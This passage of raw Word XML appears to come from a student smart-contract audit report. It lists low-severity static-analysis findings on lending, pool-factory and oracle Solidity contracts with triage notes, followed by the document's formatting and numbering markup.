        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ChainlinkPriceFeed._validate — maxStaleness != 0 &amp;&amp; block.timestamp - updatedAt &gt; maxStaleness (ChainlinkPriceFeed.sol#59)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63605F" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Triage: All timestamp comparisons are required protocol logic (swap deadlines, interest accrual, oracle staleness). Not randomness sources. Acknowledged as S-05.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636060" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detector: assembly (Informational) — 1 result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636061" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MathUtils.maxYul(uint256,uint256) — INLINE ASM (MathUtils.sol#10-13)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636062" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Triage: Intentional Yul assembly required by assignment (advanced Solidity criterion). Accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636063" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detector: too-many-digits (Informational) — 1 result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636064" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PoolFactory.predictDeterministicAddress — abi.encodePacked(type(AMMPool).creationCode, ...) (PoolFactory.sol#24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636065" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Triage: bytecode literal required for CREATE2 address prediction. Minor gas cost in a view function. Acknowledged as S-03.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636066" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detector: immutable-states (Optimization) — 4 results — Acknowledged (S-06)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636067" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LendingPool.maxLtvBps (LendingPool.sol#23) should be immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636068" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LendingPool.liquidationThresholdBps (LendingPool.sol#24) should be immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636069" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LendingPool.borrowRateBpsPerYear (LendingPool.sol#25) should be immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63606A" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LendingPool.liquidationBonusBps (LendingPool.sol#26) should be immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63606B" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Triage: Kept as storage variables intentionally to allow future Timelock-governed parameter updates. No security impact. Acknowledged as S-06.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A0527B" w14:textId="71156801" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Final summary: 0 High, 0 Medium findings. 9 Low/Informational/Optimization results — all triaged, acknowledged, or remediated per S-01 through S-09.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631AE6D7" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A7E82D" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4152D431" w14:textId="14899D20" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:sectPr w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidSect="004F09BE">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="299"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BF1F1B2" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRPr="007B3A72" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F032C3" w:rsidRPr="007B3A72">
      <w:footerReference w:type="default" r:id="rId16"/>
      <w:pgSz w:w="11910" w:h="16840"/>
      <w:pgMar w:top="1920" w:right="0" w:bottom="920" w:left="1559" w:header="0" w:footer="7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C193A9" w14:textId="77777777" w:rsidR="009E4291" w:rsidRDefault="009E4291">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="49769261" w14:textId="77777777" w:rsidR="009E4291" w:rsidRDefault="009E42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13A5B9" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="a3"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="20"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487172096" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6CC7C5F1" wp14:editId="4701B0B3">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>4160011</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>10090118</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="152400" cy="1676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7640"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="08D75067" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:spacing w:before="13"/>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w14:anchorId="6CC7C5F1" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Textbox 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:327.55pt;margin-top:794.5pt;width:12pt;height:13.2pt;z-index:-1614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NSyVkgEAABoDAAAOAAAAZHJzL2Uyb0RvYy54bWysUsGO0zAQvSPxD5bv1Gm1FBQ1XQErENIK kHb5ANexm4jYY2bcJv17xt60RXBb7WUyzozfvPfGm9vJD+JokXoIjVwuKilsMND2Yd/In4+f37yX gpIOrR4g2EaeLMnb7etXmzHWdgUdDK1FwSCB6jE2sksp1kqR6azXtIBoAxcdoNeJj7hXLeqR0f2g VlW1ViNgGxGMJeK/d09FuS34zlmTvjtHNomhkcwtlYgl7nJU242u96hj15uZhn4GC6/7wEMvUHc6 aXHA/j8o3xsEApcWBrwC53pjiwZWs6z+UfPQ6WiLFjaH4sUmejlY8+34EH+gSNNHmHiBRQTFezC/ iL1RY6R67smeUk3cnYVODn3+sgTBF9nb08VPOyVhMtrb1U3FFcOl5frd+qb4ra6XI1L6YsGLnDQS eV2FgD7eU8rjdX1umbk8jc9E0rSbuCWnO2hPrGHkNTaSfh80WimGr4F9yjs/J3hOducE0/AJysvI UgJ8OCRwfZl8xZ0n8wIKofmx5A3/fS5d1ye9/QMAAP//AwBQSwMEFAAGAAgAAAAhAIoioULlAAAA EgEAAA8AAABkcnMvZG93bnJldi54bWxMT8tugzAQvFfKP1gbqbfGUBUaCCaK+jhVqkLooUeDHbCC 1xQ7Cf37bk/tZaWdmZ2dKbazHdhFT944FBCvImAaW6cMdgI+6te7NTAfJCo5ONQCvrWHbbm4KWSu 3BUrfTmEjpEJ+lwK6EMYc85922sr/cqNGok7usnKQOvUcTXJK5nbgd9HUcqtNEgfejnqp163p8PZ Cth9YvVivt6bfXWsTF1nEb6lJyFul/PzhsZuAyzoOfxdwG8Hyg8lBWvcGZVng4A0SWKSEpGsM6pG kvQxI6ghKI2TB+Blwf9XKX8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAA AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACU AQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAljUslZIBAAAa AwAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAiiKhQuUA AAASAQAADwAAAAAAAAAAAAAAAADsAwAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAP4E AAAAAA== " filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="08D75067" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00000000">
                    <w:pPr>
                      <w:spacing w:before="13"/>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58BE96" w14:textId="77777777" w:rsidR="009E4291" w:rsidRDefault="009E4291">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="46091635" w14:textId="77777777" w:rsidR="009E4291" w:rsidRDefault="009E42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F407E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE7E93AE"/>
    <w:lvl w:ilvl="0" w:tplc="26167240">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="—"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1321" w:hanging="300"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9E26ADB4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2041"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2" w:tplc="76B0ABFC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2962" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="90BADD46">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3885" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6F8CD1AE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4808" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B3D8155C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5731" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B046141C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6653" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="ED624FB0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7576" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6D2CD12A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8499" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="152B52BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63C86B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4B459A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4778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7B546CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59B85F6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E29768E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="42AE9D0E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1640" w:hanging="320"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="90"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1710" w:hanging="390"/>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041"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3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3078" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4116" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5154"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230" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8268" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3FC658FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8EC248F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A9926C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="335CB4BE"/>
    <w:lvl w:ilvl="0" w:tplc="5C0E2370">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2041" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsia="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E3EC58F8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2870" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="ACCC89AC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3701" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2140DE68">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4531" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C630C5A4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5362" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C43A62A6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6192" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D1A2DBCE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7023" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2B9C8C8A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7853" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="188E8040">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8684" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5869088B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C808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B047285"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4EE8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9D12C89"/>
    <w:multiLevelType w:val="multilevel"/>
